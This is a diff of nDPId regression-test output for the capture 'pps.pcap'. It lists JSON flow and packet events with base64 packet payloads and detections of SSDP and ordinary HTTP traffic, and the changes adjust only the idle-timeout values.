00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180830,"flow_last_seen":1467353180830,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353180830,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1467353180830,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353180830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUgAAAQRyyvAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180830,"flow_last_seen":1467353180830,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353180830,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1467353181295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1467353181295,"pkt":"TF4M6gNlKDc3Alz6CABFAAE99F1AAEAGPTfAqAUPROn9hf5oAFDPYUlYxJOK\/oAYEBX74gAAAQEICiYb7H8rI43TR0VUIC9jb21NYWdpY2FuQXBpL2NvbXBvc2l0ZS9hcHAucGhwL0dsb2JhbC9JbmRleC9pcCBIVFRQLzEuMQ0KSG9zdDogYXBpLm1hZ2ljYW5zb2Z0LmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtdHcNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KVXNlci1BZ2VudDogTWFnaWNhbiAodW5rbm93biB2ZXJzaW9uKSBDRk5ldHdvcmsvNzIwLjUuNyBEYXJ3aW4vMTQuNS4wICh4ODZfNjQpDQoNCg=="} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} -00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1467353181515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"thread_ts_msec":1467353181515,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4BFJAADUGOAhE6f2FwKgFDwBQ\/mjEk4r+z2FKYYAYABs0tgAAAQEICisjjrEmG+x\/SFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6NDcgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1467353181295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1467353181295,"pkt":"TF4M6gNlKDc3Alz6CABFAAE99F1AAEAGPTfAqAUPROn9hf5oAFDPYUlYxJOK\/oAYEBX74gAAAQEICiYb7H8rI43TR0VUIC9jb21NYWdpY2FuQXBpL2NvbXBvc2l0ZS9hcHAucGhwL0dsb2JhbC9JbmRleC9pcCBIVFRQLzEuMQ0KSG9zdDogYXBpLm1hZ2ljYW5zb2Z0LmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtdHcNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KVXNlci1BZ2VudDogTWFnaWNhbiAodW5rbm93biB2ZXJzaW9uKSBDRk5ldHdvcmsvNzIwLjUuNyBEYXJ3aW4vMTQuNS4wICh4ODZfNjQpDQoNCg=="} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} +00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1467353181515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"thread_ts_msec":1467353181515,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4BFJAADUGOAhE6f2FwKgFDwBQ\/mjEk4r+z2FKYYAYABs0tgAAAQEICisjjrEmG+x\/SFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6NDcgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1467353182046,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353182046,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6IAAAER3+HAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1467353183830,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353183830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUkAAAQRyyrAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1467353185047,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353185047,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6MAAAER3+DAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1467353185940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"thread_ts_msec":1467353185940,"pkt":"TF4M6gNlABxCjnAxCABFAAKdKslAAIAGwJnAqHMIymwO28VHAFCsEt6EcxJBblAYAQR7YQAAR0VUIC9jb3JlP3Q9MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZ0bT0zMCZyYT0xJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxODUmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=30&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353185&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1467353186002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353186002,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5ehdAADMGwC\/KbA7bwKhzCABQxUdzEkFurBLg+VAYADiXAQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7560000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1467353185940,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"thread_ts_msec":1467353185940,"pkt":"TF4M6gNlABxCjnAxCABFAAKdKslAAIAGwJnAqHMIymwO28VHAFCsEt6EcxJBblAYAQR7YQAAR0VUIC9jb3JlP3Q9MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZ0bT0zMCZyYT0xJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxODUmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} +01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7560000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=30&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353185&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1467353186002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353186002,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5ehdAADMGwC\/KbA7bwKhzCABQxUdzEkFurBLg+VAYADiXAQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1467353186830,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353186830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUoAAAQRyynAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353187172,"flow_last_seen":1467353187172,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353187172,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1467353187172,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353187172,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAgsAAAERAYPAqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353187172,"flow_last_seen":1467353187172,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353187172,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1467353189325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353189325,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LaNAAIAGT77AqHMI3xpqE8VJAFB9cer6SbS1WFAYQTc4sgAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkZXIuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IERvd25sb2FkZXINCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloader.ini","code":0,"content_type":"","user_agent":"Downloader"}} 